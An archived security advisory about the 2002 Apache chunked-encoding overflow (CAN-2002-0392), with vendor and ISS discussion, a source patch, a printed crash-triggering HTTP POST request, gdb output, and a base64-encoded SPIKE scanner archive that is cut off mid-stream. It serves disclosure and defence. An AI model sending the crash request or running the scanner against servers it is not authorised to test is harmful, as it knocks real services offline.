Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Apache :: web5463.htm

Apache web server remote DoS and heap overflow



18th Jun 2002 [SBWID-5463]
COMMAND

	Apache web server remote DoS and heap overflow

SYSTEMS AFFECTED

	 Apache 1.3 all versions including 1.3.24

	 Apache 2 all versions up to 2.0.39

	

PROBLEM

	In Mark J Cox posting :
	

	While testing for Oracle vulnerabilities, Mark Litchfield  discovered  a
	denial of service attack for Apache on  Windows.  Investigation  by  the
	Apache Software Foundation showed that this issue  has  a  wider  scope,
	which on some platforms results in a denial  of  service  vulnerability,
	while on some other platforms presents  a  potential  a  remote  exploit
	vulnerability.
	

	We were also notified today by ISS that  they  had  published  the  same
	issue which has forced the early release of this advisory.
	

	The Common Vulnerabilities and  Exposures  project  (cve.mitre.org)  has
	assigned the name CAN-2002-0392 to this issue.
	

	Description:
	

	Versions of the Apache web server up to and including 1.3.24 and 2.0  up
	to and including 2.0.36 and 2.0.36-dev versions contain  a  bug  in  the
	routines which deal  with  invalid  requests  which  are  encoded  using
	chunked encoding. This bug  can  be  triggered  remotely  by  sending  a
	carefully crafted invalid request.  This  functionality  is  enabled  by
	default.
	

	In most cases the outcome of the  invalid  request  is  that  the  child
	process dealing with the request will  terminate.  At  the  least,  this
	could help a remote attacker launch a denial of service  attack  as  the
	parent process will eventually have  to  replace  the  terminated  child
	process  and  starting  new  children  uses   non-trivial   amounts   of
	resources.
	

	On the Windows and Netware  platforms,  Apache  runs  one  multithreaded
	child process to service requests. The  teardown  and  subsequent  setup
	time  to  replace  the  lost  child  process  presents   a   significant
	interruption of service. As the Windows and Netware ports create  a  new
	process and reread the configuration, rather than fork a child  process,
	this delay is much more pronounced than on other platforms.
	

	In Apache 2.0 the error condition is correctly detected, so it will  not
	allow an attacker to execure  arbitrary  code  on  the  server.  However
	platforms could be using a multithreaded model  of  multiple  concurrent
	requests per child process  (although  the  default  preference  remains
	multiple processes with a single thread and  request  per  process,  and
	most multithreaded models continue to create multiple child  processes).
	Using any multithreaded model, all concurrent requests currently  served
	by the affected child process will be lost.
	

	In Apache 1.3 the issue causes a stack overflow. Due to  the  nature  of
	the overflow on 32-bit Unix platforms this  will  cause  a  segmentation
	violation and the child will terminate. However on 64-bit platforms  the
	overflow can be controlled  and  so  for  platforms  that  store  return
	addresses on the stack it is likely  that  it  is  further  exploitable.
	This could allow arbitrary code to be run on the server as the user  the
	Apache children are set to run as.
	

	We have been made aware that Apache 1.3 on  Windows  is  exploitable  in
	this way.
	

	

	 Editor\'s note

	 =============

	

	ISS  initially  forwarded  the  following  patch,  however  it  as  been
	disregarded by the Apache team as unefective. ISS X-Force reply  follows
	:
	

	

	1. Locate your source directory and navigate into the \"main\" sub-

	directory.

	2. Verify that \"http_protocol.c\" is present in the current directory.

	3. To update your http_protocol.c file, create a file named

	\"apache_patch.diff\", containing the following text:

	

	- --- http_protocol.c.vuln	Fri Jun 14 16:12:50 2002

	+++ http_protocol.c	Fri Jun 14 16:13:47 2002

	@@ -2171,7 +2171,7 @@

	

	     /* Otherwise, we are in the midst of reading a chunk of data */

	

	- -    len_to_read = (r->remaining > bufsiz) ? bufsiz : r->remaining;

	+    len_to_read = (r->remaining > (unsigned int)bufsiz) ? bufsiz : r->

	remaining;

	

	     len_read = ap_bread(r->connection->client, buffer, len_to_read);

	     if (len_read <= 0) {

	

	4. Apply the source code update using the \"patch\" command, or a similar

	   utility.

	5. Build new binaries and reinstall.

	

	

	This vulnerability was  originally  detected  auditing  the  Apache  2.0
	source tree. Apache 2.0 uses the same function to  determine  the  chunk
	size, and has the same vulnerable signed  comparison.  It  is,  however,
	not vulnerable (by luck?) due to a signed  comparison  deep  within  the
	buffered reading routines (within core_input_filter).
	

	This issue is no more exploitable or unexploitable on a 32-bit  platform
	than on a 64-bit platform. Due to the  signed  comparison,  the  minimum
	size passed to the memcpy() function is 0x80000000 or about 2gb.  Unless
	Apache has over 2gb of contiguous stack memory located after the  target
	buffer  in  memory,  a  segmentation  fault  will  be  caused.  If   you
	understand how the stack is used, you will understand that  this  is  an
	impossibility.
	

	Apache on \"Win32\" is not exploitable due to any \"64-bit\"  addressing
	issues. It is  easily  exploitable  due  to  the  nature  of  structured
	exception handling on  Windows  and  the  fact  that  exception  handler
	pointers are stored on the stack.
	

	If the DoS vulnerability is related to the overflow then the  ISS  patch
	will work to prevent it. The  unsigned  comparison  prevents  any  stack
	overflow and as a result any related DoS issue is prevented. If the  DoS
	issue is unrelated, then of course the ISS patch  will  not  be  of  any
	help.
	

	 Update (20 June 2002)

	 ======

	

	Joe Testa shows what http string breaks apache :
	

	POST /x.html HTTP/1.1

	Host: 192.168.x.x

	Transfer-Encoding: chunked

	

	80000000

	Rapid 7

	0

	

	

	Here is the behavior that the above string will produce:
	

	UNIX:
	

	    Apache 1.3.24:

	        Connection is instantly dropped.

	        The connection is not logged in the access_log, but the following

	        will appear in the error_log:

	

	        [Mon Jun 17 16:12:25 2002] [notice] child pid 21452 exit signal

	        Segmentation fault (11)

	

	    Apache 2.0.36:

	        No effect!  Hmmm...

	

	Win32:
	

	    Apache 1.3.24:

	        Connection is instantly dropped.

	        The connection is *not* logged in access_log nor error_log!

	

	    Apache 2.0.36:

	        Connection appears to hang while child thread consumes all

	        available memory.  After a minute or two, the OS reports that

	        virtual memory is exhausted via a server-side dialog box.

	        A remote client cannot determine the result of this test

	        because the connection remains open until the dialog box is

	        dismissed.  A non-vulnerable server will not drop the

	        connection because it is waiting to receive 2 gigabytes of

	        legitimately chunked data.

	        The connection is not logged in access_log, but the following will

	        appear in the error_log:

	

	        [Tue Jun 18 09:16:34 2002] [notice] Parent: child process exited

	        with status 3221225477 -- Restarting.

	

	Note that in the test string above, you  can  interchange  the  \"POST\"
	with \"GET\", and you  can  use  any  hex  value  between  80000000  and
	FFFFFFFF for the chunk size.
	

	-Also-
	

	Dave Aitel  of  Immunity,  Inc.  [http://www.immunitysec.com]  posted  a
	scanner for the vulerability :
	

	This is a spike script, and  the  associated  generic  spike  .c  and  a
	makefile. Get SPIKE 2.4 to compile and run this.
	

	$ make; ./generic_chunked localhost 80 apachechunked.spk 0 0=20

	make: Nothing to be done for `all\'.

	Target is localhost

	Fuzzing Variable 0:0

	parsing apachechunked.spk

	

	[Tue Jun 18 15:53:09 2002] [notice] child pid 17647 exit signal

	Segmentation fault (11)

	Server: Apache-AdvancedExtranetServer/1.3.23 (Mandrake Linux/4mdk)

	auth_ldap/1.6.0 mod_ssl/2.8.7 OpenSSL/0.9.6c PHP/4.1.2

	

	

	(gdb) c

	Continuing.

	

	Program received signal SIGSEGV, Segmentation fault.

	[Switching to Thread 1024 (LWP 17224)]

	0x401b2d79 in memcpy () from /lib/libc.so.6

	(gdb) where

	#0  0x401b2d79 in memcpy () from /lib/libc.so.6

	#1  0x080950a0 in ?? ()

	#2  0x0806366f in ap_get_client_block ()

	#3  0x08065b5f in ap_discard_request_body ()

	#4  0xd8000000 in ?? ()

	Cannot access memory at address 0x80975

	(gdb) x/2i $pc

	0x401b2d79 <memcpy+41>:	mov    0x1c(%edi),%edx

	0x401b2d7c <memcpy+44>:	sub    $0x20,%ecx

	(gdb) print/x $edi

	$1 =3D 0xbfffffec

	(gdb) q

	

	Content-Type: application/x-tar

	Content-Disposition: attachment; filename=apachefun.tar

	Content-Transfer-Encoding: base64

	

	YXBhY2hlY2h1bmtlZC5zcGsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAxMDA2NjQAMDAwMDc2

	NQAwMDAwNzY1ADAwMDAwMDAwMTIyADA3NTAzNzA1MDc2ADAxMzAyMQAgMAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB1c3RhciAgAGRhdmUAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAZGF2ZQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAv

	L2FwYWNoZWNodW5rZWQuc3BrCgpzX3N0cmluZ19yZXBlYXQoIkEiLDB4MTAwMDAwKTsKLy9zX3N0

	cmluZygiNFxyXG5BQUFBXHJcbiIpOwoKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGdl

	bmVyaWNfY2h1bmtlZC5jAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwMTAwNjQ0ADAwMDA3NjUA

	MDAwMDc2NQAwMDAwMDAxNjU3MgAwNzUwMzcwNjY1NgAwMTMwMjMAIDAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAdXN0YXIgIABkYXZlAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAGRhdmUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALyog

	U3RhcnQgd2ViZnV6enByZWx1ZGUuYyAqLwovKgogIFNlcnZlcjogQXBhY2hlLUFkdmFuY2VkRXh0

	cmFuZXRTZXJ2ZXIvMS4zLjIzIChNYW5kcmFrZSBMaW51eC80bWRrKSBhdXRoX2xkYXAvMS42LjAg

	bW9kX3NzbC8yLjguNyBPcGVuU1NMLzAuOS42YyBQSFAvNC4xLjIKCiAgW1R1ZSBKdW4gMTggMTU6

	NDI6NDkgMjAwMl0gW25vdGljZV0gY2hpbGQgcGlkIDE3MjI0IGV4aXQgc2lnbmFsIFNlZ21lbnRh

	dGlvbiBmYXVsdCAoMTEpCiAgCiovCgoKCiNpbmNsdWRlIDxzdGRpby5oPgojaW5jbHVkZSA8c3Rk

	bGliLmg+CiNpbmNsdWRlIDxzdHJpbmcuaD4gLypmb3IgbWVtc2V0Ki8KI2luY2x1ZGUgPHN5cy90

	eXBlcy5oPgojaW5jbHVkZSA8c3lzL3NvY2tldC5oPgojaW5jbHVkZSA8c2lnbmFsLmg+CgojaW5j

	bHVkZSAic3Bpa2UuaCIKI2luY2x1ZGUgImhkZWJ1Zy5oIgojaW5jbHVkZSAidGNwc3R1ZmYuaCIK

	CiNpbmNsdWRlICJkbHJwYy5oIgoKLypjaGFuZ2UgdGhlc2UgdG8gc2tpcCBvdmVyIHZhcmlhYmxl

	cyovCmludCBTS0lQRlVaWlNUUj0wOwppbnQgU0tJUFZBUklBQkxFUz0wOwoKdm9pZApzZXR1cF9w

	b3N0KCkKewoKc19zdHJpbmcoIlBPU1QgLyIpOwpzX3N0cmluZygiIEhUVFAvMS4xXHJcbiIpOwpz

	X3N0cmluZygiSG9zdDogIik7CnNfc3RyaW5nKCJEQVZFQUlURUwiKTsKc19zdHJpbmcoIlxyXG4i

	KTsKc19zdHJpbmcoIlVzZXItQWdlbnQ6ICIpOwpzX3N0cmluZygiTW96aWxsYS81LjAiKTsKc19z

	dHJpbmcoIkdhbGVvbi8xLjAuMyAoWDExOyBMaW51eCBpNjg2OyBVOykgR2Vja28vMFxyXG4iKTsK

	c19zdHJpbmcoIkFjY2VwdDogdGV4dC94bWwsYXBwbGljYXRpb24veG1sLGFwcGxpY2F0aW9uL3ho

	dG1sK3htbCx0ZXh0L2h0bWw7cT0wLjksdGV4dC9wbGFpbjtxPTAuOCx2aWRlby94LW1uZyxpbWFn

	ZS9wbmcsaW1hZ2UvanBlZyxpbWFnZS9naWY7cT0wLjIsdGV4dC9jc3MsKi8qO3E9MC4xXHJcbiIp

	OwpzX3N0cmluZygiQWNjZXB0LUxhbmd1YWdlOiBlblxyXG4iKTsKc19zdHJpbmcoIkFjY2VwdC1F

	bmNvZGluZzogZ3ppcCwgZGVmbGF0ZSwgY29tcHJlc3M7cT0wLjlcclxuIik7CnNfc3RyaW5nKCJB

	Y2NlcHQtQ2hhcnNldDogSVNPLTg4NTktMSwgdXRmLTg7cT0wLjY2LCAqO3E9MC42NlxyXG4iKTsK

	c19zdHJpbmcoIktlZXAtQWxpdmU6IDMwMFxyXG4iKTsKc19zdHJpbmcoIkNvbm5lY3Rpb246IGtl

	ZXAtYWxpdmVcclxuIik7CnNfc3RyaW5nKCJDb250ZW50LXR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3

	LWZvcm0tdXJsZW5jb2RlZFxyXG4iKTsKc19zdHJpbmcoIlRyYW5zZmVyLUVuY29kaW5nOiBjaHVu

	a2VkXHJcbiIpOwovL3Nfc3RyaW5nKCJDb250ZW50LUxlbmd0aDogMFxyXG4iKTsKc19zdHJpbmco

	IlxyXG4iKTsKc19zdHJpbmcoIjRcclxuIik7CnNfc3RyaW5nKCJBQUFBXHJcbiIpOwpzX3N0cmlu

	ZygiODAwMDAwMDBcclxuIik7Ci8vc19zdHJpbmcoIjBcclxuIik7Ci8vc19zdHJpbmcoIlxyXG4i

	KTsKfQoKCnZvaWQKdXNhZ2UoKQp7CiAgZnByaW50ZihzdGRlcnIsIlVzYWdlOiAuL2dlbmVyaWNf

	d2ViX3NlcnZlcl9mdXp6IHRhcmdldCBwb3J0IGZpbGUuc3BrIHNraXB2YXJpYWJsZXMgc2tpcGZ1

	enpzdHJpbmdcclxuIik7CiAgZnByaW50ZihzdGRlcnIsIkV4YW1wbGU6IC4vZ3dzZiBleGNoYW5n

	ZTEgODAgb3dhMS5zcGsgMCAwXG4iKTsgCiAgZnByaW50ZihzdGRlcnIsImh0dHA6Ly93d3cuaW1t

	dW5pdHlzZWMuY29tL3NwaWtlLmh0bWxcbiIpOwoKICBleGl0KC0xKTsKfQoKaW50Cm1haW4gKGlu

	dCBhcmdjLCBjaGFyICoqIGFyZ3YpCnsKICBpbnQgZmlyc3Q7CiAgY2hhciAqIHRhcmdldDsKICBj

	aGFyIGJ1ZmZlclsxNTAwMDBdOwogIGNoYXIgcmVxdWVzdGJ1ZmZlclsxNTAwMDBdOwogIGludCBw

	b3J0OwogIGNoYXIgKiBzcGtmaWxlOwogIHN0cnVjdCBzcGlrZSAqIG91cl9zcGlrZTsKICB1bnNp

	Z25lZCBsb25nIHJldHZhbDsKICBpbnQgbm90ZmluOwogIGludCBmaXJzdGZ1eno7CiAgaW50IGZ1

	enp2YXJudW0sZnV6enN0cm51bTsgLypmb3IgZnV6eiB2YXJpYWJsZSBjb3VudCovCiAgdW5zaWdu

	ZWQgbG9uZyBzZW50bnVtOwoKICBpZiAoYXJnYyE9NikKICAgIHsKICAgICAgdXNhZ2UoKTsKICAg

	IH0KCiAgdGFyZ2V0PWFyZ3ZbMV07CiAgcHJpbnRmKCJUYXJnZXQgaXMgJXNcclxuIixhcmd2WzFd

	KTsKCiAgcG9ydD1hdG9pKGFyZ3ZbMl0pOwoKICBzcGtmaWxlID0gYXJndlszXTsKICAKICBTS0lQ

	VkFSSUFCTEVTPWF0b2koYXJndls0XSk7CiAgU0tJUEZVWlpTVFI9YXRvaShhcmd2WzVdKTsKCiAg

	b3VyX3NwaWtlPW5ld19zcGlrZSgpOwogIHNfaW5pdF9mdXp6aW5nKCk7CgogIC8qc2hlZXNoLiov

	CiAgc2lnbmFsKFNJR1BJUEUsU0lHX0lHTik7CgogIGlmIChvdXJfc3Bpa2U9PU5VTEwpCiAgICB7

	CiAgICAgIGZwcmludGYoc3RkZXJyLCJNYWxsb2MgZmFpbGVkIHRyeWluZyB0byBhbGxvY2F0ZSBh

	IHNwaWtlLlxyXG4iKTsKICAgICAgZXhpdCgtMSk7IAogICAgfQoKICBzZXRzcGlrZShvdXJfc3Bp

	a2UpOwogIHNldHVwX3Bvc3QoKTsKICBpZiAoc3Bpa2Vfc2VuZF90Y3AodGFyZ2V0LHBvcnQpPT0w

	KQogICAgewogICAgICBwcmludGYoIkNvdWxkbid0IGNvbm5lY3QgdG8gaG9zdCBvciBzZW5kIGRh

	dGEhXHJcbiIpOwogICAgICAvKmV4aXQoLTEpOyovCiAgICB9CiAgCiAgLypkdXJpbmcgc192YXJp

	YWJsZSBwdXNoLCBpZiBmdXp6c3RyaW5nIGlzID09IGN1cnJlbnRmdXp6c3RyaW5nCiAgICB0aGVu

	IHNldCBkaWRsYXN0ZnV6enN0cmluZy4gSWYgZnV6enZhcmlhYmxlIGlzID09IGN1cnJlbnQKICAg

	IHZhcmlhYmxlLCBzZXQgZGlkbGFzdGZ1enp2YXJpYWJsZSovCgogIAogIC8qemVyb3RoIGZ1enog

	dmFyaWFibGUgaXMgZmlyc3QgdmFyaWFibGUqLwogIHNfcmVzZXRmdXp6dmFyaWFibGUoKTsKICBm

	dXp6dmFybnVtPTA7CiAgZnV6enN0cm51bT0wOwogIGZpcnN0ZnV6ej0xOwoKICB3aGlsZSAoIXNf

	ZGlkbGFzdHZhcmlhYmxlKCkpCiAgICB7CiAgICAgIHNfcmVzZXRmdXp6c3RyaW5nKCk7CiAgICAg

	IC8qemVyb3RoIGZ1enogc3RyaW5nIGlzIG5vIGNoYW5nZSovCgoKICAgICAgaWYgKGZpcnN0ZnV6

	eikKICAgICAgewogICAgICAvKnplcm90aCBmdXp6IHN0cmluZyBpcyBubyBjaGFuZ2UqLwogICAg

	ICAvKnNlZSBiZWxvdyBmb3Igd2h5IHdlIGhhdmUgdGhpcyBpZiBzdGF0ZW1lbnQgYW5kIGxvb3Aq

	LwogICAgICBpZiAoZnV6enZhcm51bTxTS0lQVkFSSUFCTEVTICkKICAgICAgICB7CiAgICAgICAg

	ICBmb3IgKGZ1enp2YXJudW09MDsgZnV6enZhcm51bTxTS0lQVkFSSUFCTEVTOyBmdXp6dmFybnVt

	KyspCiAgICAgICAgICAgIHsKICAgICAgICAgICAgICBzX2luY3JlbWVudGZ1enp2YXJpYWJsZSgp

	OwogICAgICAgICAgICB9CiAgICAgICAgfQoKICAgICAgLypoZXJlIGlzIGFub3RoZXIgcGFydCBv

	ZiB3aGVyZSB3ZSBpbXBsZW1lbnQgdGhlIGFiaWxpdHkgdG8ganVtcCB0byBhIHBhcnRpY3VsYXIK

	ICAgICAgICBwbGFjZSBpbiB0aGUgZnV6emluZyovCiAgICAgIGlmIChmdXp6c3RybnVtPFNLSVBG

	VVpaU1RSKQogICAgICAgIHsKICAgICAgICAgIGZvciAoZnV6enN0cm51bT0wOyBmdXp6c3RybnVt

	PFNLSVBGVVpaU1RSOyBmdXp6c3RybnVtKyspCiAgICAgICAgICAgIHsKICAgICAgICAgICAgICBz

	X2luY3JlbWVudGZ1enpzdHJpbmcoKTsKICAgICAgICAgICAgfQogICAgICAgIH0KICAgICAgZmly

	c3RmdXp6PTA7CiAgICAgIH0KICAgICAgZWxzZQogICAgICB7CiAgICAgICAgICAgICAgLyp3ZSBy

	ZXNldCB0aGlzIGhlcmUgc28gZXZlcnkgbmV3IHZhcmlhYmxlIGdldHMgYSBuZXcgY291bnQqLwog

	ICAgICAgICAgICAgIGZ1enpzdHJudW09MDsKICAgICAgfQoKCiAgICAgIAogICAgICB3aGlsZSgh

	c19kaWRsYXN0ZnV6enN0cmluZygpKQoJewoJICBwcmludGYoIkZ1enppbmcgVmFyaWFibGUgJWQ6

	JWRcbiIsZnV6enZhcm51bSxmdXp6c3RybnVtKTsKCSAgLy9wcmludGYoImNsZWFyaW5nXG4iKTsJ

	ICAKCSAgc3Bpa2VfY2xlYXIoKTsKCiNkZWZpbmUgTUFYU0VORCAweDgwMDAwMDAwCiNkZWZpbmUg

	U0VORE5VTSAweDQKCSAgc2VudG51bT0wOwoJICBwcmludGYoInBhcnNpbmcgJXNcbiIsc3BrZmls

	ZSk7CgkgIHNfcGFyc2Uoc3BrZmlsZSk7CgkgIHdoaWxlICgodW5zaWduZWQgaW50KXNlbnRudW08

	KHVuc2lnbmVkIGludClNQVhTRU5EKQoJICAgIHsKCSAgICAgIHByaW50Zigic2VuZGluZ1xuIik7

	CgkgICAgICBpZiAoc3Bpa2Vfc2VuZCgpPDApCgkJewoJCSAgcHJpbnRmKCJDb3VsZG4ndCBjb25u

	ZWN0IHRvIGhvc3Qgb3Igc2VuZCBkYXRhIVxyXG4iKTsKCSAgICAgIC8qZXhpdCgtMSk7Ki8KCQl9

	CgkgICAgICBzZW50bnVtKz1TRU5ETlVNOwoJICAgICAgcHJpbnRmKCJTZW50ICV4XG4iLHNlbnRu

	dW0pOwoJICAgIH0KCgkgIC8qc2VlLCB0aGUgdGhpbmcgaXMgdGhhdCB0aGUgc3Bpa2UgaXMgbm90

	IGd1YXJhbnRlZWQgdG8gYmUKICAgICAgICAgICAgbnVsbCB0ZXJtaW5hdGVkLCBzbyBqdXN0IGEg

	cGxhaW4gcHJpbnRmIG9uIHRoZQogICAgICAgICAgICBzX2dldF9kYXRhYnVmKCkgaXMgaWxsLWFk

	dmlzZWQuKi8KCSAgbWVtc2V0KHJlcXVlc3RidWZmZXIsMHgwMCxzaXplb2YocmVxdWVzdGJ1ZmZl

	cikpOwoJICBpZiAoc19nZXRfc2l6ZSgpPjI1MDApCgkgICAgbWVtY3B5KHJlcXVlc3RidWZmZXIs

	c19nZXRfZGF0YWJ1ZigpLDI1MDApOwoJICBlbHNlCiAgICAgICAgICAgewoJICAgIG1lbWNweShy

	ZXF1ZXN0YnVmZmVyLHNfZ2V0X2RhdGFidWYoKSxzX2dldF9zaXplKCkpOwogICAgICAgICAgIH0K

	ICAKCgkgIC8qaGVyZSB3ZSBwcmludCBvdXQgb3VyIHJlcXVlc3QqLwoJICBwcmludGYoIlJlcXVl

	c3Q6XG4lLjI1MDBzXG5FbmRSZXF1ZXN0XG4iLHJlcXVlc3RidWZmZXIpOwoKCSAgZmlyc3Q9MTsK

	CSAgbm90ZmluPTE7CgkgIHJldHZhbD0xOwogICAgICAgICAgcHJpbnRmKCJSZXNwb25zZTpcbiIp

	OwoJICB3aGlsZShyZXR2YWwgJiYgbm90ZmluKSAKCSAgICB7CiAJICAgICAKCSAgICAgIG1lbXNl

	dChidWZmZXIsMHgwMCxzaXplb2YoYnVmZmVyKSk7CgkgICAgICBub3RmaW49c19mZF93YWl0KCk7

	CgkgICAgICBub3RmaW49c19mZF93YWl0KCk7CgkgICAgICBub3RmaW49c19mZF93YWl0KCk7Cgkg

	ICAgICBpZiAoIW5vdGZpbikKICAgICAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgICBwcmlu

	dGYoIlNlcnZlciBkaWRuJ3QgYW5zd2VyIGluIHRpbWUgbGltaXRcbiIpOwoJCWJyZWFrOwogICAg

	ICAgICAgICAgICAgfQoJICAgICAgcmV0dmFsPXJlYWQob3VyX3NwaWtlLT5mZCxidWZmZXIsMjUw

	MCk7CglpZiAoZmlyc3QgJiYgKHJldHZhbD09LTEgfHwgcmV0dmFsPT0wKSApCiAgICAgICAgICAg

	ICAgICB7CiAgICAgICAgICAgICAgICAgICBwcmludGYoIioqKlNlcnZlciBjbG9zZWQgY29ubmVj

	dGlvbiFcbiIpOwoJCSAgIGZwcmludGYoc3RkZXJyLCJSZXF1ZXN0OiAlc1xuIixyZXF1ZXN0YnVm

	ZmVyKTsKICAgICAgICAgICAgICAgICAgIGZwcmludGYoc3RkZXJyLCIqKipTZXJ2ZXIgY2xvc2Vk

	IGNvbm5lY3Rpb24hXG4iKTsKCQkgICBicmVhazsKICAgICAgICAgICAgICAgIH0KCQlmaXJzdD0w

	OwoJICAgICAgaWYgKHJldHZhbCkKCQl7CgkJICAgIGlmIChzdHJzdHIoYnVmZmVyLCAiNTAwIG9r

	IikgCgkJCXx8IHN0cnN0cihidWZmZXIsIkludGVybmFsIFNlcnZlciBFcnJvciIpCgkJCSkgCiAg

	ICAgICAgICAgICAgICAgICAgewoJCQlmcHJpbnRmKHN0ZGVyciwiUmVxdWVzdDogJXNcbiIscmVx

	dWVzdGJ1ZmZlcik7CgkJCWZwcmludGYoc3RkZXJyLCJSZXNwb25zZTogJXNcbiIsYnVmZmVyKTsK

	ICAgICAgICAgICAgICAgICAgICB9CgoKCQkgICAgcHJpbnRmKCIqKiUuNTAwcyoqXG4iLGJ1ZmZl

	cik7CgkJICAvKnRoaXMgaXMgd2hlcmUgeW91IGZpbHRlciByZXNwb25zZXMgb3V0IHRoYXQgeW91

	IGRvbid0IHdhbnQgdG8gYm90aGVyIHNlZWluZy4qLwojaWYgMAoJCSAgLypkb24ndCBwcmludCBv

	dXQgNDA0IGVycm9ycyovCgkJICBpZiAoIXN0cnN0cihidWZmZXIsIjQwNCIpICYmICFzdHJzdHIo

	YnVmZmVyLCI0MDAgQmFkIFJlcXVlc3QiKSAmJiAhc3Ryc3RyKGJ1ZmZlciwiY2hlY2sgdGhhdCBp

	dCBpcyBlbnRlcmVkIGNvcnJlY3RseSIpKQogCQlicmVhazsKI2VuZGlmCgkJICAvKmhlcmUgd2Ug

	c3BlZWQgdGhpbmdzIHVwIGJ5IG5vIGNvbnRpbnVpbmcgdG8gcmVhZCBwYXN0IHRoaXMgZHVtYiBl

	cnJvciBtZXNzYWdlKi8KCQkgIC8qZG8gdGhpcyBzYW1lIHRoaW5nIGZvciBhbnkgcmVxdWVzdCB0

	aGF0IGNvbnRpbnVlcyB0byBzbG93IHlvdSBkb3duIGFuZCBpcyBub24taW50ZXJlc3RpbmcqLwog

	ICAgICAgICAgICAgICAgICBpZiAoc3Ryc3RyKGJ1ZmZlciwiPFRJVExFPjQwNCIpKQogICAgICAg

	ICAgICAgICAgICAgIGJyZWFrOwogICAgICAgICAgICAgICAgICBpZiAoc3Ryc3RyKGJ1ZmZlciwi

	PFRJVExFPjQwMSIpKQoJCSAgICBicmVhazsKCQkgIGlmIChzdHJzdHIoYnVmZmVyLCI0MDEgQWNj

	ZXNzIGRlbmllZCIpKQoJCSAgICBicmVhazsKCQkgIGlmIChzdHJzdHIoYnVmZmVyLCJQdWJsaWM6

	IE9QVElPTlMiKSkKCQkgICAgYnJlYWs7CgkJICBpZiAoc3Ryc3RyKGJ1ZmZlciwiUGxlYXNlIGRv

	IG5vdCBhbHRlciB0aGlzIGZpbGUiKSkKCQkgICAgYnJlYWs7CgkJICBpZiAoc3Ryc3RyKGJ1ZmZl

	ciwiR0lGODlhIikpCgkJICAgIGJyZWFrOwoJCSAgaWYgKHN0cnN0cihidWZmZXIsIlRoaXMgb2Jq

	ZWN0IG1heSBiZSBmb3VuZCA8YSBIUkVGPVwibG9jYWxzdGFydC5hc3BcIiIpKQoJYnJlYWs7CgoJ

	CWlmIChzdHJzdHIoYnVmZmVyLCJob21lIHBhZ2UsIGFuZCB0aGVuIGxvb2sgZm9yIGxpbmtzIHRv

	IHRoZSBpbmZvcm1hdGlvbiB5b3Ugd2FudCIpKQoJCWJyZWFrOwoJCSBpZihzdHJzdHIoYnVmZmVy

	LCJMb2NhdGlvbjogbG9jYWxzdGFydC5hc3AiKSkKCQlicmVhazsKIAkJIGlmIChzdHJzdHIoYnVm

	ZmVyLCJUaGlzIGlzIHRoZSBkZWZhdWx0IHBhZ2UgdGhhdCBhcHBlYXJzIG9uIG5ldyBBT0xzZXJ2

	ZXIgaW5zdGFsbGF0aW9ucyIpKQoJCWJyZWFrOwoJCWlmIChzdHJzdHIoYnVmZmVyLCJUaGlzIHBh

